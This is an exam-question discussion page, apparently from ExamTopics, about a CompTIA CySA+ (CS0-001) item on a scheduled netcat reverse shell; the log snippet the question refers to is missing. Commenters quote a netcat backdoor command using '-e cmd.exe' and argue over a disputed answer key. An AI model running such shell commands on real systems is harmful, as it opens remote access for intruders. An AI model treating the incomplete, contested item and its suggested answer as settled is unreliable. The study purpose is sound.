ExamTopics Logo
Mail Us[email protected]
Menu
Comptia Discussions
exam questions

Exam CS0-001 All Questions

View all questions & answers for the CS0-001 exam
Go to Exam

Exam CS0-001 topic 1 question 35 discussion

Actual exam question from CompTIA's CS0-001
Question #: 35
Topic #: 1
[All CS0-001 Questions]

A cybersecurity analyst is retained by a firm for an open investigation. Upon arrival, the cybersecurity analyst reviews several security logs.
Given the following snippet of code:

Which of the following combinations BEST describes the situation and recommendations to be made for this situation?

  • A. The cybersecurity analyst has discovered host 192.168.0.101 using Windows Task Scheduler at 13:30 to runnc.exe; recommend proceeding with the next step of removing the host from the network.
  • B. The cybersecurity analyst has discovered host 192.168.0.101 to be running thenc.exe file at 13:30 using the auto cron job remotely, there are no recommendations since this is not a threat currently.
  • C. The cybersecurity analyst has discovered host 192.168.0.101 is beaconing every day at 13:30 using thenc.exe file; recommend proceeding with the next step of removing the host from the network.
  • D. The security analyst has discovered host 192.168.0.101 is a rogue device on the network, recommend proceeding with the next step of removing the host from the network.
Show Suggested Answer Hide Answer
Suggested Answer: A 🗳️
by Blind_Hatred at June 28, 2020, 8:56 a.m.

Comments

Chosen Answer:
This is a voting comment (?). It is better to Upvote an existing comment if you don't have anything to add.
Switch to a voting comment New
Submit Cancel
Jeend
2 years, 4 months ago
Task Scheduler auto
upvoted 1 times
...
Kuku55
4 years, 3 months ago
Answer is D. Nc.exe is passing the argument to IPv4 address and 777 port with -e to give that IPv4 and 777 port a cmd.exe or a shell. You can verify this by using netcat or creating a shell with it.
upvoted 1 times
...
Acrisius
4 years, 5 months ago
I vote for A. at (time) sets the scheduled task run time. nc (ip then port) in this case 777 means connect to ip on port x. -e cmd means execute cmd.
upvoted 1 times
...
0xff
4 years, 7 months ago
@MagicianRecon - From the link provided the answer should be D. From the snippet, host 192.168.0.101 is opening a reverse shell which gives remote access capabilities to hackers and should be considered as a rouge device and instantly removed. Command: Listening backdoor shell on Windows:C:\>nc –l –p [LocalPort] –e cmd.exe
upvoted 1 times
...
MagicianRecon
4 years, 9 months ago
A is correct https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf
upvoted 2 times
...
Blind_Hatred
4 years, 10 months ago
I think something is wrong with these questions and answers. An internal host is passing a shell to a host 192.168.0.101 (which is listening on port 777) using netcat. This is a scheduled task that runs at 13:30. Best answer that I can find is D, but I feel like I'm not getting all the information here.
upvoted 3 times
...
Community vote distribution
A (35%)
C (25%)
B (20%)
Other
Most Voted
A voting comment increases the vote count for the chosen answer by one.

Upvoting a comment with a selected answer will also increase the vote count towards that answer by one. So if you see a comment that you already agree with, you can upvote it instead of posting a new comment.

SaveCancel
exam
Someone Bought Contributor Access for:
SY0-701
London, 1 minute ago